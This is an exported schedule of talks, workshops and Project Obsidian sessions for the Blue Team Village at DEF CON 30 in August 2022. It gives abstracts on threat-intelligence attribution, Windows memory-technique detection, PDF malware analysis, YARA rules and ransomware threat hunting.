0.12
Blue Team Village (Hybrid) at DEF CON 30
call-for-content-2022
2022-08-11
2022-08-14
4
00:05
https://cfc.blueteamvillage.org
https://cfc.blueteamvillage.org/media/call-for-content-2022/img/BTVillage_logo_Nqvd7Zz.png
US/Pacific
Talks (Virtual)
Attribution and Bias: My terrible mistakes in threat intelligence attribution
Mini Talk (virtual, prerecorded)
2022-08-12T11:00:00-07:00
11:00
00:30
The threat intelligence industry suffers from the flow of inaccurate information. This symptom is because of irresponsible announcements and different perceptions of each vendor. In this presentation, I would like to share how we can quickly go to the wrong decisions and what attitude we need to prevent these failures.
call-for-content-2022-183-attribution-and-bias-my-terrible-mistakes-in-threat-intelligence-attribution
en
One of the most important aspects of threat intelligence is the attribution of threat actors—identifying the entity behind an attack, their motivations, or the ultimate sponsor of the attack. Attribution is one of the most complicated aspects of cybersecurity, and it is easy to make mistakes because the underlying architecture of the internet offers numerous ways for attackers to hide their tracks. Threat actors can use false flags to deceive the security community about their identity, and natural human bias can lead researchers in the wrong direction. In this presentation, I will discuss three of the biggest lessons I’ve learned with regards to attribution—and how researchers can avoid making the same errors.
The first mistake is related to perception bias. The Olympic Destroyer was a cyber-sabotage attack that happened during the PyeongChang Winter Olympic in 2018. Many security vendors published information about the substance of the attack alongside unclear speculation about who was ultimately behind it. During the early stage of my Olympic Destroyer research, I strongly believed a North Korea-linked threat actor was behind the attack. Looking back, I’m overwhelmed by my confirmation bias at that time. The relationship between North Korea and South Korea was relatively stable during the Olympics, but North Korea sometimes attacked South Korea regardless. Therefore, I assumed the attack was associated with a North Korean threat actor that wanted to sow chaos during the Olympic season. However, my colleague discovered a fascinating rich header false flag designed to disguise the fact that this attack was carried out by an unrelated threat actor. Also, I confirmed that the threat actor behind this attack utilized a totally different modus operandi than the presumed North Korean threat actor after an in-depth, onsite investigation. I had allowed my perception bias to hinder my attribution efforts.
The second mistake occurred as a result of an over-reliance on third-party functions.
Researchers are often inclined to rely on too many third-party tools, and occasionally this blind faith causes mistakes. One day, I discovered that one Korean-speaking threat actor utilized a 0-day exploit embedded in a Word document. Based on the metadata of the malicious document, I used Virustotal to find additional documents with similar metadata. All of them had the same language code page, which made me even more biased. From then, I started going in the wrong direction. I totally believed that those documents were created by the same threat actor. However, I later discovered that the documents were created by two different actors with very similar characteristics. Both of them are Korean-speaking actors, who, historically, attack the same target. Eventually, I uncovered the difference between the two and was able to reach the right conclusion—but this required going beyond what my tools told me was the correct answer.
The last mistake occurred as a result of impatience. When I investigated one cryptocurrency exchange incident, I noticed that the cryptocurrency trading application was compromised and had been delivered with a malicious file. Without any doubt, I concluded that the supply chain of this company was compromised, and contacted them via email to notify them of this incident. But, as soon as I contacted them, their websites went offline and the application disappeared from the website. After a closer examination of their infrastructure, I recognized that everything was fake, including the company website, application, and 24/7 support team. Later, we named this attack Operation AppleJeus, which a US-CERT also mentioned when they indicted three North Korean hackers. In my haste to conclude my research, I failed to notice an operation aspect of the operation.
Threat Intelligence is a high-profile industry with numerous stories that have major geopolitical ramifications. Not only is attribution one of the hardest aspects of this field—it’s the one that carries the most significant consequences if not done correctly. Unfortunately, human intuition and bias interfere with proper attribution, leading to mistakes. By sharing my own struggles with attribution, it is my hope other researchers in the security community can carry out their own investigations with greater accuracy.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/X9YX3P/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/X9YX3P/feedback/
Talks (Virtual)
Malicious memory techniques on Windows and how to spot them
Talk (virtual, prerecorded)
2022-08-12T11:45:00-07:00
11:45
01:00
Malicious actors are always trying to find new ways to avoid detection by evermore vigilant EDR systems and deploy their payloads. Over the years, the scope of techniques used has branched from relatively simplistic hash comparison and sandbox avoidance to low level log dodging and even direct circumvention of EDR telemetry acquisition. By examining some of the techniques used on Windows systems this talk will highlight will highlight the range of capabilities defensive operators are dealing with, how some can be detected and, in rare cases, the performance and false-positive obstacles in designing detection capability.
call-for-content-2022-164-malicious-memory-techniques-on-windows-and-how-to-spot-them
en
My presentation will cover malicious memory techniques which will focus on the Windows operating system. These will span from relatively simple in-line hooking techniques used to jump to malicious code or circumvent legitimate code execution, all the way to manipulation of exception handling mechanisms. The talk will also cover information on problematic situations which occur when designing detection mechanisms for such activities in the real world where cost-balancing is required for resource management.
I will explain in-line hooking, Kernel patching (InfinityHook, Ghost_in_the_logs), Heaven-Gate hooking and Vectored Exception Handler (VEH) manipulation techniques (FireWalker) and how they can be detected. In-line hooking and Heavens-Gate hooking involves the practice of manipulating the loaded memory of a module within a specific processes memory space. Kernel Patching involves injecting a hook into the Kernel memory space in order to provide a low level, high priority bypassing technique for malicious programs to circumvent ETW log publication via vulnerable kernel driver installation. VEH manipulation is the use of the high priority frameless exception mechanism in order to circumvent memory integrity checks, manipulate flow control and even run malicious shellcode. Detection for all these techniques will involve advancing from the explanation of its execution to the telemetry sources that can be leveraged for detection purposes. In all cases this involves the examination of volatile memory, however as each technique targets a different native functionality, the mechanisms required to analyze the memory differ greatly. The deviations can be relatively simple, but in some cases an understanding of undocumented mechanisms and structures is required to affect detection capability
Examination of un-tabled module function modifications will also provide insight into some of the difficulties involved in this detection development work. This section will provide the audience with a low level technical understanding of how these techniques are targeted, developed and used by malicious actors and some possible solutions for detection, with an explanation of the inherent caveats in such solutions (primarily around resource availability or accuracy trade-offs).
A full explanation on devised detection methodology and collectable telemetry will be provided for each malicious technique. This will cover the overall detection capabilities as well as exploring the low level mechanisms used to collect this data from the monitored system such as OP code heuristics and memory location attribution crossing CPU mode boundaries. Included in this explanation will be an explanation on issues encountered with collection, typically related to OS architecture choices, and how these can also be circumvented to enable effective monitoring.
Audience members should leave my presentation having a firm grasp on the fundamentals of all the techniques outlined and why attackers may choose to employ them in different scenarios. Along with a functional understanding of the malicious technique, the audience members will also be supplied with a working understanding of detection options for these techniques and clear examples of how monitoring can be deployed and integrated into their solutions.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/XBMJCJ/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/XBMJCJ/feedback/
Talks (Virtual)
Improving security posture of MacOS and Linux with Azure AD
Talk (virtual, prerecorded)
2022-08-12T13:00:00-07:00
13:00
01:00
Most organizations have Windows, MacOS and Linux in their environment. Typically many of the security controls that are applied to Windows are not applied to MacOS or Linux, due to the size of the footprint and the difficulty of implementation. This can lead to holes in an organization's overall security posture as well as a poor end user experience.
Recently, Azure AD has released some new functionality to help improve the overall environment security posture for MacOS and Linux, both servers and clients. We'll discuss how these pieces work deep down and some best practices on deploying them.
call-for-content-2022-155-improving-security-posture-of-macos-and-linux-with-azure-ad
en
We are from the Microsoft identity product group responsible for Active Directory and Azure Active Directory. We’ve noticed many customers struggle to deliver a good end user experience to their Apple and Linux Platforms. There are various ways to do this, but many customers are simply unaware of recommended configurations and best practices. This will be a deeply technical session that focuses not only on what can be done to improve this experience, but how the underlying Microsoft, Linux, and Apple technologies can work better together.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/SZVDZ8/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/SZVDZ8/feedback/
Talks (Virtual)
Lend me your IR's!
Talk (virtual, prerecorded)
2022-08-12T14:15:00-07:00
14:15
01:00
Protecting systems and networks as a tech defender means withstanding a constant barrage of unsophisticated attacks from automated tools, botnets, crawlers, exploit kits, phish kits, and script kiddies; oh my! Occasionally, we encounter attacks worthy of style points for creativity or new twists on old attack techniques. This talk features demoed reenactments from some advanced attacks investigated by the presenter. The demos showcase technical deep dives of the underpinnings from both the attacker and investigator sides of these attacks. Attendee key takeaways are strategies, freely available tools, and techniques helpful during incident response investigations.
call-for-content-2022-159-lend-me-your-ir-s-
/media/call-for-content-2022/submissions/XQMWWB/lmyirs_G6mrXl2.png
en
This is a fun technical talk covering three of my favorite security investigations as an Incident Response professional. The presentation features demoed reenactments of actual real-world attacks. I showcase both the attacker side as well as the investigation side of these security incidents. I show and talk through example source code and explain how each of the attacks work. I then flip these scenarios around by explaining how to use numerous free and open-source tools to investigate those same security incidents. Each scenario is closed by covering the follow-up remediation steps.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/XQMWWB/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/XQMWWB/feedback/
Talks (Virtual)
Malware Hunting - Discovering techniques in PDF malicious
Talk (virtual, prerecorded)
2022-08-12T15:30:00-07:00
15:30
01:00
Demonstrate different kind of structures in the binaries as a PDF(header/ body/cross-reference table/trailer), explaining how each session works within a binary, what are the techniques used such as packers, obfuscation with JavaScript (PDF) and more
call-for-content-2022-165-malware-hunting-discovering-techniques-in-pdf-malicious
/media/call-for-content-2022/submissions/PVCLSY/Filipi_Pires_-_Talks_9K3S99A.jpeg
en
We'll walk through the structures of a PDF, analyzing each part of it, demonstrating how Threat Actors work in the inclusion of malicious components in the structures of the file, in addition to demonstrating the collection of IOC(Indicators of Attack)s and how to build IOA(Indicators of Attack) for analysis by behavior, to anticipate new attacks. Demonstrating structures in the binaries as a PDF(header/ body/cross-reference table/trailer) and performing a comparison of malicious PDFs, explaining how each session works within a binary, what are the techniques used such as packers, obfuscation with JavaScript (PDF) and more, explaining too about some anti-disassembly techniques, demonstrating as a is the action of these malware’s and where it would be possible to “include” a malicious code.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/PVCLSY/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/PVCLSY/feedback/
Talks (Virtual)
YARA Rules to Rule them All
Lightning Talk (virtual, prerecorded)
2022-08-12T16:45:00-07:00
16:45
00:15
Malware developers work just like legitimate software developers, aiming to reduce the time wasted on repetitive tasks wherever possible. That means they create and reuse code across their malware. This has a pay-off for malware hunters and threat intelligence researchers, we can learn how to create search rules to detect this kind of code reuse, Traditional Yara rules are written on strings, but if we implement code leveraging YARA code reuse rules in addition to the strings rule the rule will last decades.
call-for-content-2022-161-yara-rules-to-rule-them-all
en
Whenever we want to proactively hunt for malware of interest for threat intelligence purposes, YARA is the swiss-army knife that makes the work of malware researchers and threat intelligence Researchers easier.
We will talk about leveraging the YARA to detect the future version of the malware.
Malware developers work just like legitimate software developers, aiming to reduce the time wasted on repetitive tasks wherever possible. That means they create and reuse code across their malware. This has a pay-off for malware hunters and threat intelligence researchers, we can learn how to create search rules to detect this kind of code reuse, Traditional Yara rules are written on strings, but if we implement code leveraging YARA code reuse rules in addition to the strings rule the rule will last decades. We can leverage that for finding future malware from the same authors using their digital code fingerprints.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/WU7CZU/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/WU7CZU/feedback/
Workshops (Virtual)
Practical Dark Web Hunting using Automated Scripts
Workshop (virtual, live)
2022-08-12T11:00:00-07:00
11:00
01:30
How can you effectively hunt data from the dark web using scripts? How can you circumvent scraping defenses on the dark web? If you are curious about the answers to these questions and want to learn how to effectively write automated scripts for this task, then this workshop is for you. In this workshop, you will learn why collecting data from the dark web is essential, how you can create your tools & scripts, and automate your scripts for effective collection. The workshop's primary focus will be on circumventing defenses put by forums on the dark web against scraping.
call-for-content-2022-157-practical-dark-web-hunting-using-automated-scripts
en
The workshop will start by taking everyone over why we should focus on the dark web for research and why it is important to collect data from the dark web. We will explore the importance of data collection with some examples. The second part of the workshop will cover some dark web OSINT tools that one can use to start with dark web data collection/hunting. Attendees will learn how these tools work and what different categories of these dark web OSINT tools one can utilize in their research. The third part of the workshop will cover tools and libraries to create your dark web hunting platform. We will explore writing code and automating dark web data collection. This part includes a live lab demo and code explanation. The workshop will end with a few tips on OpSec practices and resources to start with dark web hunting.
Takeaways from the workshop:
1. Understanding why darkerb research is important
2. Darkweb OSINT tools collection to start your research
3. Basic understanding of automated dark web data hunting
4. Python Codebase to start with your dark web data collection
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/MZLTQC/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/MZLTQC/feedback/
Workshops (Virtual)
Ransomware ATT&CK and Defense
Workshop (virtual, live)
2022-08-12T13:00:00-07:00
13:00
01:30
This hands-on training workshop will walk attendees through hunting for Tactics, Techniques, and Procedures (TTPs) frequently used by ransomware adversaries. From Reconnaissance and Initial Access to Exfiltration and Impact, attendees will be exposed to a compressed ransomware attack lifecycle. Workshop TTPs will be mapped to the MITRE ATT&CK Framework, and it will incorporate offensive operation elements such as adversary emulation, but while emphasizing purple and blue teaming. We will explore the endpoint and network logs left behind by attack TTPs and how the blue team can utilize such logs and defensive tooling to detect and disrupt the attack.
call-for-content-2022-182-ransomware-att-ck-and-defense
/media/call-for-content-2022/submissions/GBGNZQ/threathunter_400x400_dmTKcOe_IgEAN8j.jpg
en
This hands-on training workshop will walk attendees through threat hunting exercises to detect and investigate common Tactics, Techniques, and Procedures (TTPs) frequently used by ransomware threat actors during an attack. From Reconnaissance and Initial Access to Exfiltration and Impact, attendees will be exposed to a compressed ransomware attack lifecycle while being able to leverage attack TTPs including commands, scripts, tools, communication channels, and techniques that we frequently see and use in the wild. Tactics and techniques will be mapped to the MITRE ATT&CK Framework, and will be inspired by ATT&CK's Adversary Emulation Plans. The workshop will accordingly incorporate offensive operation elements such as adversary emulation and red teaming, but with an emphasis on purple teaming and blue teaming. In other words, we will explore the logs and other artifacts potentially left behind by our attack TTPs and how the blue team might utilize endpoint and network logs and defensive tooling to detect and disrupt the ATT&CK kill chain components. Examples of tools and threat intelligence sources that will be incorporated include Atomic Red Team, open-source offensive security tools such as Mimikatz, Living off the Land Binaries and Scripts (LOLBAS) including PowerShell, real-world or Proof-of-Concept malware samples and exploits, and leaked ransomware playbooks supplemented by other open-source intelligence (OSINT) sources; and specifically on the blue team side, popular security logging pipeline and Security Information and Events Management (SIEM) tools such as Sysmon and Elastic Stack.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/GBGNZQ/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/GBGNZQ/feedback/
Main Stage (In-person)
Blue Team Village Opening Ceremony
Village Ceremony (in-person)
2022-08-12T10:00:00-07:00
10:00
00:30
Blue Team Village Opening Ceremony
call-for-content-2022-222-blue-team-village-opening-ceremony
en
Blue Team Village Opening Ceremony
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/LRQVHC/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/LRQVHC/feedback/
Main Stage (In-person)
Obsidian Live: Eating the Elephant 1 byte at a Time
Project Obsidian (in-person)
2022-08-12T10:30:00-07:00
10:30
01:00
Incident Response: This is a live walkthrough of a real world incident focused on the first half of incident response. We will be breaking down scoping, triage, and communication aspects of incident handling into digestible and actionable recommendations.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-201-obsidian-live-eating-the-elephant-1-byte-at-a-time
en
Incident Response: This is a live walkthrough of a real world incident focused on the first half of incident response. We will be breaking down scoping, triage, and communication aspects of incident handling into digestible and actionable recommendations.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/U9GVJV/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/U9GVJV/feedback/
Main Stage (In-person)
Obsidian Forensics: KillChain1 - Adventures in Splunk and Security Onion
Project Obsidian (in-person)
2022-08-12T13:00:00-07:00
13:00
01:00
A Live Forensics Walkthrough of Obsidian Kill Chain 1 (KC1) forensics analysis using Splunk and Security Onion
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-204-obsidian-forensics-killchain1-adventures-in-splunk-and-security-onion
en
A Live Forensics Walkthrough of Obsidian Kill Chain 1 (KC1) forensics analysis using Splunk and Security Onion
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/DVVT8R/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/DVVT8R/feedback/
Main Stage (In-person)
Obsidian CTH Live: Killchain 1 - Go Phish!
Project Obsidian (in-person)
2022-08-12T14:00:00-07:00
14:00
01:00
Come take a dive into the data lake and cast some queries to find proof that users have run files from malicious actors. How can we prove the existence of troublesome activity in the environment?
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-214-obsidian-cth-live-killchain-1-go-phish-
en
Come take a dive into the data lake and cast some queries to find proof that users have run files from malicious actors. How can we prove the existence of troublesome activity in the environment? We will take a journey as if we are a new member of the Magnum Tempus Financial Security Team and proceed through a Threat Hunt through the eyes of a newbie in the field of Threat Hunting.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/AGZJET/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/AGZJET/feedback/
Main Stage (In-person)
Heavyweights: Threat Hunting at Scale
Panel (in-person)
2022-08-12T15:00:00-07:00
15:00
01:00
Panel Discussion discussing how evolving techniques for defenders is amplified, from some of the teams behind the blogs.
call-for-content-2022-192-heavyweights-threat-hunting-at-scale
en
Panel Discussion discussing how evolving techniques for defenders is amplified, from some of the teams behind the blogs.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/PKXKG3/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/PKXKG3/feedback/
Main Stage (In-person)
Take Your Security Skills From Good to Better to Best!
Panel (in-person)
2022-08-12T16:00:00-07:00
16:00
01:00
Why dwell in the lobby of the Security field when you could be enjoying the view from the penthouse? Get insight from our esteemed panel on how to stay up to date on hacker news, increase your technical skills, and be aware of opportunities for professional development. Our panel will also discuss the importance of sending that elevator back down to help others so that our entire industry can grow and thrive, just like you will. Open up your ears and your mind and enjoy the gems that will be dropped.
call-for-content-2022-194-take-your-security-skills-from-good-to-better-to-best-
en
Why dwell in the lobby of the Security field when you could be enjoying the view from the penthouse? Get insight from our esteemed panel on how to stay up to date on hacker news, increase your technical skills, and be aware of opportunities for professional development. Our panel will also discuss the importance of sending that elevator back down to help others so that our entire industry can grow and thrive, just like you will. Open up your ears and your mind and enjoy the gems that will be dropped.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/ZQXSNG/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/ZQXSNG/feedback/
Main Stage (In-person)
Blue Teaming Cloud: Security Engineering for Cloud Forensics & Incident Response
Panel (in-person)
2022-08-12T17:00:00-07:00
17:00
01:00
Whether you’re in AWS, Azure or GCP, cloud security engineering doesn’t stop at basic guardrails and sending logs to a SIEM. So how do you engineer for the challenges unique to cloud forensics and incident response? This panel of cloud security engineers and incident responders will share their experiences and insights to help you take your security engineering from “just the basics” to “prepared for the inevitable”.
call-for-content-2022-189-blue-teaming-cloud-security-engineering-for-cloud-forensics-incident-response
en
Whether you’re in AWS, Azure or GCP, cloud security engineering doesn’t stop at basic guardrails and sending logs to a SIEM. So how do you engineer for the challenges unique to cloud forensics and incident response? This panel of cloud security engineers and incident responders will share their experiences and insights to help you take your security engineering from “just the basics” to “prepared for the inevitable”.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/FKU39P/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/FKU39P/feedback/
Project Obsidian: Track 0x41 (In-person)
Obsidian Forensics: Kill Chain 1 Endpoint Forensics Walkthrough
Project Obsidian (in-person)
2022-08-12T10:30:00-07:00
10:30
01:00
Obsidian Forensics Station: Kill Chain 1 Endpoint Forensics Walkthrough
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-206-obsidian-forensics-kill-chain-1-endpoint-forensics-walkthrough
en
Obsidian Forensics Station: In this pre-recorded presentation we will walk through the artifacts and analysis of the Obsidian Kill Chain 1 using forensics artifacts found on the affected Endpoints.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/VPQKHY/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/VPQKHY/feedback/
Project Obsidian: Track 0x41 (In-person)
Obsidian: IR - It all starts here, scoping the incident
Project Obsidian (in-person)
2022-08-12T11:30:00-07:00
11:30
01:00
You can't analyze what you don't know, learn to prepare yourself for any investigation no matter the subject.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-215-obsidian-ir-it-all-starts-here-scoping-the-incident
en
Scoping and Triage
You can't analyze what you don't know, learn to prepare yourself for any investigation no matter the subject.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/YMPLC7/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/YMPLC7/feedback/
Project Obsidian: Track 0x41 (In-person)
Obsidian: IR - Mise En Place for Investigations
Project Obsidian (in-person)
2022-08-12T13:00:00-07:00
13:00
01:00
If you don't document it, it didn't happen. A real world approach to IR communication.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-200-obsidian-ir-mise-en-place-for-investigations
en
Project Obsidian Incident Response station will walk through how to capture the necessary information as you are actively working an incident without slowing down on tickets, notes, timeline recording, and status updates. Plus tips based on years of IR experience on what NOT to do; spend less time writing and more time doing.
This session is based on Kill Chain 1 data set and will show you how to prep and work an incident with a focus on communication and efficiency in all aspects.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/LQYWFS/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/LQYWFS/feedback/
Project Obsidian: Track 0x41 (In-person)
Obsidian Forensics: The Importance of Sysmon for Investigations
Project Obsidian (in-person)
2022-08-12T14:00:00-07:00
14:00
01:00
In this video we will discuss Sysmon -- what it is, how to get it, the configuration file, the events it logs, and why it's so valuable to forensic investigations.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-212-obsidian-forensics-the-importance-of-sysmon-for-investigations
en
Video presentation outlining the benefits of Sysmon for investigations.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/3T8SAB/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/3T8SAB/feedback/
Project Obsidian: Track 0x42 (In-person)
Obsidian CTH: Go Phish: Visualizing Basic Malice
Project Obsidian (in-person)
2022-08-12T10:30:00-07:00
10:30
01:00
Come take a dive into the data lake and cast some queries to find proof that users have run files from malicious actors. How can we prove the existence of troublesome activity in the environment? We will take a journey as if we are a new member of the Magnum Tempus Financial Security Team and proceed through a Threat Hunt through the eyes of a newbie in the field of Threat Hunting.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience.
call-for-content-2022-223-obsidian-cth-go-phish-visualizing-basic-malice
en
Come take a dive into the data lake and cast some queries to find proof that users have run files from malicious actors. How can we prove the existence of troublesome activity in the environment? We will take a journey as if we are a new member of the Magnum Tempus Financial Security Team and proceed through a Threat Hunt through the eyes of a newbie in the field of Threat Hunting.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/NYVHUD/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/NYVHUD/feedback/
Project Obsidian: Track 0x42 (In-person)
Obsidian CTI: Generating Threat Intelligence from an Incident
Project Obsidian (in-person)
2022-08-12T11:30:00-07:00
11:30
01:00
This session presents an overview of how threat intelligence can be generated from an incident and shared with various stakeholders. We'll run through an incident and demonstrate how the CTI team plays a critical role by performing research and providing insights based on stakeholder requirements.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-199-obsidian-cti-generating-threat-intelligence-from-an-incident
en
This module covers:
- Direction & Planning: Overview of CTI stakeholders and intelligence requirements
- Collection: CTI analysts role during an incident
- Processing: Intrusion data & information
- Analysis & Production: Elements to include in a report
- Dissemination: Sharing the report with stakeholders
- Feedback & Evaluation: Methods for receiving feedback
The objective is to demonstrate the critical role CTI plays both during and after an incident.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/ZAHDHJ/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/ZAHDHJ/feedback/
Project Obsidian: Track 0x42 (In-person)
Obsidian CTH: Hunting for Adversary's Schedule
Project Obsidian (in-person)
2022-08-12T13:00:00-07:00
13:00
01:00
Once an adversary gained a foothold, they typically would like to keep their access and establish persistence. Scheduled tasks are one of the most commonly used persistence techniques in adversary intrusions and for a good reason. In this session we take a look at Scheduled Tasks. We start with the basics, and then learn how to create a hypothesis to conduct a threat hunt. In the end, we'll take a stab at detection engineering concepts surrounding the creation/revision of detections/analytics from telemetry we obtain from hunting this technique.
Project Obsidian is an immersive, defensive cybersecurity learning experience.
call-for-content-2022-225-obsidian-cth-hunting-for-adversary-s-schedule
en
Once an adversary gained a foothold, they typically would like to keep their access. Here, I'm using the term ""access"" loosely where it could be many things like C2 beacon, script, binary, security source providers, shortcuts, and so on. This is called Persistence and in MITRE speak ""TA0003"" [3]. We take a look at one such persistence method, Scheduled Task. Scheduled tasks are one of the most commonly used persistence techniques in adversary intrusions and for a good reason. It provides flexibility to be created on local and remote machines and provides several ways to be created (from GUI to Net32API), along with the ability to combine/achieve tactics like Execution and Privilege Escalation. We start with the basics of scheduled tasks, and why and when an adversary would like to use them. Then we jump into the hell of threat hunting to see some ways to create a hypothesis and investigate the result set. In the end, we take a stab at detection engineering concepts surrounding the creation/revision of detections/analytics from queries/results we got from hunting this technique.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/AMXVTY/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/AMXVTY/feedback/
Project Obsidian: Track 0x42 (In-person)
Obsidian REM: Long Walks On The Beach: Analyzing Collected PowerShells
Project Obsidian (in-person)
2022-08-12T14:00:00-07:00
14:00
01:00
So you just got a bunch of Powershell scripts dumped on you. What now?
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-217-obsidian-rem-long-walks-on-the-beach-analyzing-collected-powershells
en
A quick introduction to malware analysis, Powershell script analysis, and how to not panic when VirusTotal shrugs.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
